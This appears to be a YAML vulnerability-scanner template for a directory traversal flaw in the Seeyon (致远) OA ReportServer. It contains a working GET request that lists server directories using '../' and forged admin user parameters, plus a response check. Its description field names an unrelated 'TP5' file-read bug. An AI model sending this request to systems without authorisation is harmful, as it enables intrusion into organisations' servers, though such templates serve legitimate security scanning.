product: 致远OA
vName: 致远OA ReportServer Directory Shipping
type: 目录遍历
vID: [ ]
level: 3
vDesc: TP5-Arbitrary-file-read
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true
    verify:
      logic: and
      check:
        - body:
            value:
              - ../seeyon
            logic: and
        - status: 200
